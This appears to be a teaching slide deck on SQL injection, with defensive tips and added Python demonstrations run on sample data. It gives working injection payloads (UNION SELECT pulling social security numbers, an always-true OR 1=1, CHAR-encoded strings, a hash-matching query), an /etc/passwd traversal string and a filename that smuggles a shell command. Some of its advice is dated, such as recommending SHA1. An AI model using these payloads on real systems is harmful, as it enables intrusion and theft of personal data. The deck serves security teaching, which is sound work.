SQL Injection

Who Am I?
- Sean Taylor
- Computer Science major
- Software developer
- Web developer
- Amateur hacker

Who I Work For
- Streaming Media Hosting, Inc.
- Currently looking for a Senior Network and System Administrator - contact firstname.lastname@example.org for more information.

Software Used
- PHP 5
- MySQL 5
- Apache 2
- Vim (it's better than Emacs)

What is SQL Injection?
- Not a software flaw
- Arises with concatenation of dynamic queries
- Can be performed on anything using an SQL-based language, such as MySQL, PostgreSQL, MS-SQL, and others.

What is SQL Injection?
    // Dynamic query built by string interpolation; the request parameter is never checked.
    $query = "SELECT * FROM my_table WHERE id = {$_GET['id']}";

Attack Techniques

Attack Techniques: Testing for injectable variables
- Toss in an apostrophe (')
- Mess with integers
- Throw in an always-true statement

Attack Techniques: Throwing in apostrophes
    files.php?id='
    SELECT * FROM my_table WHERE id = '
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Attack Techniques: Messing with integers
    files.php?id=1%20hello%20world!
    SELECT * FROM my_table WHERE id = 1 hello world!
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'hello world!' at line 1

Attack Techniques: Always True Statements
    files.php?id=2%20OR%201=1%20--%20
    SELECT * FROM my_table WHERE id = 2 OR 1=1 -- AND …
Returns everything in my_table.
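The three probes above, plus the UNION trick and the prepared-statement and cast defenses the deck gives later, reproduced against an in-memory SQLite database. This is an added example, not the deck's code: the deck uses PHP and MySQL, here Python's sqlite3 module stands in, and the table contents are constructed sample data.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the deck's my_table and social_securities."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE my_table (id INTEGER, quote TEXT);
        INSERT INTO my_table VALUES (1, 'first'), (2, 'second'), (3, 'third');
        CREATE TABLE social_securities (social TEXT);
        INSERT INTO social_securities VALUES ('111-11-1111'), ('222-22-2222');
    """)
    return db

def vulnerable_lookup(db, raw_id):
    """String concatenation, as in the deck's $query: the input is parsed as SQL."""
    query = "SELECT quote FROM my_table WHERE id = " + raw_id
    return [row[0] for row in db.execute(query)]

def prepared_lookup(db, raw_id):
    """Prepared statement: the value is bound separately and never parsed as SQL."""
    rows = db.execute("SELECT quote FROM my_table WHERE id = ?", (raw_id,))
    return [row[0] for row in rows]

def cast_lookup(db, raw_id):
    """Software-layer cast (the deck's settype() advice): reject anything not an int."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return None  # invalid input; nothing is sent to the database
    return prepared_lookup(db, id_value)

if __name__ == "__main__":
    db = make_db()
    for probe in ["2", "'", "1 hello world!", "2 OR 1=1 -- ",
                  "0 UNION SELECT social FROM social_securities -- "]:
        try:
            print("vulnerable:", repr(probe), "->", vulnerable_lookup(db, probe))
        except sqlite3.OperationalError as err:
            print("vulnerable:", repr(probe), "-> syntax error:", err)
        print("prepared:  ", repr(probe), "->", prepared_lookup(db, probe))
        print("cast:      ", repr(probe), "->", cast_lookup(db, probe))
```

Note that the bound value "2" still matches row 2 because SQLite converts it at the value level, while "2 OR 1=1 -- " as a bound value matches nothing: the on-the-fly conversion the deck mentions happens to the value, not to the query text.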
Attack Techniques: The UNION keyword
- If you have a laptop with you, point yourself to http://www.technotaylor.net/secure/example1.php?showall=yes

Attack Techniques: The UNION keyword
    …?showall=no' UNION SELECT social FROM social_securities --%20
Returns:
    quote in database:
    111-11-1111
    222-22-2222
    333-33-3333
    444-44-4444
    555-55-5555
    666-66-6666

Attack Techniques: SELECT AS
- http://www.technotaylor.net/secure/example2.php

Attack Techniques: SELECT AS
    …?id=30 UNION SELECT social AS quote FROM social_securities --%20
Returns:
    111-11-1111

Attack Techniques: Multi-return vs. Single return
- Obviously can't perform SELECT *
- How do we get around this for multiple values in a SELECT statement?

Attack Techniques: Boolean operators can be performed practically everywhere
    … FROM social_securities WHERE social > '111-11-1111' --%20
Returns:
    222-22-2222

Defense Techniques

Defense Techniques: Escaping quotes is not enough
- addslashes() and mysql_escape_string() in PHP won't save you!
- http://www.technotaylor.net/secure/example3.php

Defense Techniques: C-String Attack
- Replace any string in your injection query with a CONCAT of CHARs
    … SELECT FROM social_securities WHERE social > CONCAT(CHAR(49), CHAR(49), CHAR(49), CHAR(45), …) --%20
Returns:
    222-22-2222

Defense Techniques: Take advantage of on-the-fly conversions
- Some databases, like MySQL, do on-the-fly conversions. For example, a string can be converted easily to an integer on the fly and vice-versa without needing to strictly cast.
- When strings are properly escaped, there is no breaking out of them.

Defense Techniques: Cast your variables at the software layer
- PHP has a function called settype(), so you can be sure that if you've received a string it will always be an int.

Defense Techniques: If you have a pre-determined set of inputs, use them to your advantage.
- If you know the values are going to be "red", "blue", or "green", create a switch-case declaration to verify the variables and dump anything else that comes in as invalid.

Defense Techniques: If you have a pre-determined length of input, limit the input length at the software layer
- If you only have input that's 1-8, limit the length of the input to simply one character.

Defense Techniques: Use prepared statements when possible
- PHP comes with an awesome SQL security suite called PearDB.

Defense Techniques: If prepared statements aren't a possible solution, use SQL libraries built for this purpose
- SafeSQL: http://www.phpinsider.com/php/code/SafeSQL/
- StrictDB: http://www.technotaylor.net/strictdb/

General Security Tips

General Security Tips: PHP specific
- Never, ever, ever, EVER use eval().
- Don't use $_REQUEST -- use $_GET, $_POST and $_COOKIE instead.
- Turn off magic_quotes_gpc -- they're useless and annoying. Add "php_flag magic_quotes_gpc off" to your .htaccess file.
- If you're not debugging, turn off error reporting with error_reporting(0).

General Security Tips: Cross-site scripting (aka XSS)
- Problem: user can put in HTML tags.
- Solution: strip and replace all HTML-specific characters:
    & => &amp;
    " => &quot;
    ' => &#039;
    < => &lt;
    > => &gt;
- PHP has a function that does this for you:
    htmlspecialchars("string goes here");

General Security Tips: Directory traversal
- Problem: input argument is a file to be read on the server.
- Solution: don't do that, because it is very stupid. If someone puts in an argument for the file called "../../../etc/passwd", congratulations, you've compromised your server by showing off the password file!

General Security Tips: File uploads
- MIME types are never to be trusted. Neither are file extensions.
- To verify a file's actual type, you may have to go as far as opening the file and inspecting its header information!
- Beware how you handle filenames: browsers can be manipulated to send malicious file extensions, such as "my_picture.jpg; cat ../../../etc/passwd".

General Security Tips: Password storing
- Don't use two-way encryption.
- MD5 has been broken -- use SHA1.
- Don't forget to salt your hashes!

General Security Tips: Salting your hashes
- Salting is appending or prepending an incoming password with an 8-16 character string of random characters and hashing the result.
- Salting keeps people from performing dictionary attacks on your database.
- http://www.technotaylor.net/secure/example4.php?showall=yes

General Security Tips: An SQL-injected dictionary hash-attack
    …?showall=no' UNION SELECT username FROM users WHERE hash = (SELECT hash FROM users WHERE username = 'CRASH_OVERRIDE') AND NOT username = 'CRASH_OVERRIDE' --%20
Returns:
    registered users in database:
    bob
    steve
    bill

More Information
- Good 'ol Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
- Toorcon presentation on SQL injection: http://video.google.com/videoplay?docid=5773019873031992689
- PHP Security whitepaper: http://www.acunetix.com/websitesecurity/php_whitepaper.pdf

The End
You have just lost The Game.
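Why the salt matters for the hash-matching query above, as an added example that is not part of the deck: the subquery from example4 is run directly against a constructed users table (bob, steve and bill reuse CRASH_OVERRIDE's password), once with unsalted hashes and once with the deck's per-user random salt. The deck names SHA1; this example substitutes SHA-256 and uses SQLite in place of MySQL, both assumptions of the example.

```python
import hashlib
import os
import sqlite3

def unsalted_hash(password):
    """Unsalted: every user with the same password stores the same hash."""
    return hashlib.sha256(password.encode()).hexdigest()

def salted_hash(password, salt=None):
    """Deck's recipe: prepend a random 8-16 character string, hash the result.
    The salt is returned so it can be stored next to the hash."""
    if salt is None:
        salt = os.urandom(8).hex()  # 16 random hex characters
    return salt, hashlib.sha256((salt + password).encode()).hexdigest()

def verify(password, salt, stored_hash):
    """Login check: recompute with the stored salt and compare."""
    return salted_hash(password, salt)[1] == stored_hash

def build_users(salted):
    """Constructed users table; bob, steve and bill reuse CRASH_OVERRIDE's password."""
    creds = [("CRASH_OVERRIDE", "hackplanet"), ("bob", "hackplanet"),
             ("steve", "hackplanet"), ("bill", "hackplanet"), ("alice", "different")]
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, salt TEXT, hash TEXT)")
    for user, pw in creds:
        salt, digest = salted_hash(pw) if salted else ("", unsalted_hash(pw))
        db.execute("INSERT INTO users VALUES (?, ?, ?)", (user, salt, digest))
    return db

def users_sharing_hash_with(db, username):
    """The subquery from the deck's example4 injection, run directly: which other
    accounts carry exactly the same stored hash as `username`?"""
    query = ("SELECT username FROM users WHERE hash = "
             "(SELECT hash FROM users WHERE username = ?) AND NOT username = ?")
    return sorted(row[0] for row in db.execute(query, (username, username)))

if __name__ == "__main__":
    print("unsalted:", users_sharing_hash_with(build_users(salted=False), "CRASH_OVERRIDE"))
    print("salted:  ", users_sharing_hash_with(build_users(salted=True), "CRASH_OVERRIDE"))
```

With unsalted hashes the query lists every account that reuses the password; with per-user salts the same query returns nothing, which is the dictionary-attack resistance the slide describes.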